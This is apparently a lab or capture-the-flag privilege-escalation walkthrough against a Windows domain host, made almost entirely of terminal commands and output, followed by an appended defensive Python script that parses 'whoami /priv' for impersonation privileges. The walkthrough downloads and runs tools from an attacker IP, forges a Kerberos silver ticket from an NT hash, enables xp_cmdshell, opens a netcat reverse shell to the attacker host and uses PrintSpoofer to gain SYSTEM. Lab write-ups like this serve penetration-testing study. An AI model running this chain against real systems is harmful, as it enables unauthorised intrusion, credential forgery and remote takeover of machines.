Priv Esc

*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> IEX(New-Object Net.WebClient).downloadString('http://192.168.45.239/PrivescCheck.ps1');Invoke-PrivescCheck
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> netstat -ano | findstr /I 1433
  TCP    0.0.0.0:1433           0.0.0.0:0              LISTENING       2184
  TCP    [::]:1433              [::]:0                 LISTENING       2184
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> iwr 192.168.45.239/chisel.exe -o chisel.exe
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> .\chisel.exe client 192.168.45.239:1335 R:1433:127.0.0.1:1433
chisel.exe : 2024/10/15 19:14:26 client: Connecting to ws://192.168.45.239:1335
    + CategoryInfo          : NotSpecified: (2024/10/15 19:1...168.45.239:1335:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
2024/10/15 19:14:27 client: Connected (Latency 39.4055ms)
❯ netexec mssql 127.0.0.1 -u svc_mssql  -p Service1 --port 1433
MSSQL       127.0.0.1       1433   NAGOYA           [*] Windows 10 / Server 2019 Build 17763 (name:NAGOYA) (domain:nagoya-industries.com)
MSSQL       127.0.0.1       1433   NAGOYA           [+] nagoya-industries.com\svc_mssql:Service1

Forge a Silver Ticket for the MSSQL service

❯ impacket-ticketer -nthash E3A0168BC21CFB88B95C954A5B18F57C -domain-sid S-1-5-21-1969309164-1513403977-1686805993 -domain nagoya-industries.com -spn MSSQL/nagoya.nagoya-industries.com Administrator
❯ export KRB5CCNAME=$PWD/Administrator.ccache
SQL (NAGOYA-IND\Administrator  dbo@master)> sp_configure 'show advanced options', '1';
INFO(nagoya\SQLEXPRESS): Line 196: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (NAGOYA-IND\Administrator  dbo@master)> RECONFIGURE;
SQL (NAGOYA-IND\Administrator  dbo@master)> sp_configure 'xp_cmdshell', '1';
INFO(nagoya\SQLEXPRESS): Line 196: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (NAGOYA-IND\Administrator  dbo@master)> RECONFIGURE;
SQL (NAGOYA-IND\Administrator  dbo@master)> xp_cmdshell whoami
output
--------------------
nagoya-ind\svc_mssql
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> cd C:\programdata
*Evil-WinRM* PS C:\programdata> iwr 192.168.45.239/nc.exe -o nc.exe
SQL (NAGOYA-IND\Administrator  dbo@master)> xp_cmdshell "C:\\programdata\\nc.exe 192.168.45.239 1337 -e powershell.exe"
PS C:\Windows\system32> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
PS C:\programdata> iwr 192.168.45.239/PrintSpoofer64.exe -o printspoofer.exe
PS C:\programdata> .\printspoofer.exe -i -c powershell.exe
.\printspoofer.exe -i -c powershell.exe
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami ; type C:\Users\Administrator\Desktop\proof.txt ; ipconfig
whoami ; type C:\Users\Administrator\Desktop\proof.txt ; ipconfig
nagoya-ind\nagoya$
707ad72dba55f91d0bba2cf131119dd7

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 192.168.246.21
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.246.254
PS C:\Windows\system32>
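The `whoami /priv` listing above is the check PrintSpoofer performs before it does anything ("[+] Found privilege: SeImpersonatePrivilege"): a service account that can be driven to run commands (here via xp_cmdshell) and that holds an impersonation privilege is the whole escalation path. The following is an added example, not part of the original writeup, that parses that output the way a hardening audit would, to flag such privileges on service-account tokens. The sample text is the session output above; the `HIGH_RISK` set and the function names are this example's own choices.

```python
import re

# Privileges that let a process obtain and use another account's token.
# Held by a service account that an attacker can make execute commands,
# they are the prerequisite for the PrintSpoofer-style escalation shown above.
HIGH_RISK = {
    "SeImpersonatePrivilege",
    "SeAssignPrimaryTokenPrivilege",
}

# Constructed sample: the `whoami /priv` output from the session above.
SAMPLE = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# One table row: privilege name, free-text description, Enabled/Disabled.
ROW = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")


def parse_privileges(text):
    """Return {privilege_name: (description, state)} from `whoami /priv` text."""
    privs = {}
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            name, desc, state = m.groups()
            privs[name] = (desc, state)
    return privs


def risky_privileges(privs, include_disabled=True):
    """Names of high-risk privileges present in the token, sorted.

    A privilege shown as 'Disabled' is still held by the token: the process
    can turn it on itself with AdjustTokenPrivileges, so by default it counts.
    Pass include_disabled=False to report only what is currently enabled.
    """
    return sorted(
        name for name, (_, state) in privs.items()
        if name in HIGH_RISK and (include_disabled or state == "Enabled")
    )


if __name__ == "__main__":
    found = risky_privileges(parse_privileges(SAMPLE))
    if found:
        print("Token holds impersonation privileges:", ", ".join(found))
        print("Mitigation: keep xp_cmdshell disabled and do not expose this "
              "account's command execution to SQL logins.")
    else:
        print("No impersonation privileges on this token.")
```

Run against the session's output it reports both SeImpersonatePrivilege and the disabled-but-held SeAssignPrimaryTokenPrivilege; the same parser can be pointed at `whoami /priv` captured from any service account (SQL, IIS application pools) during a build review, where `sp_configure 'xp_cmdshell'` being left at 1 is the companion finding to look for.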
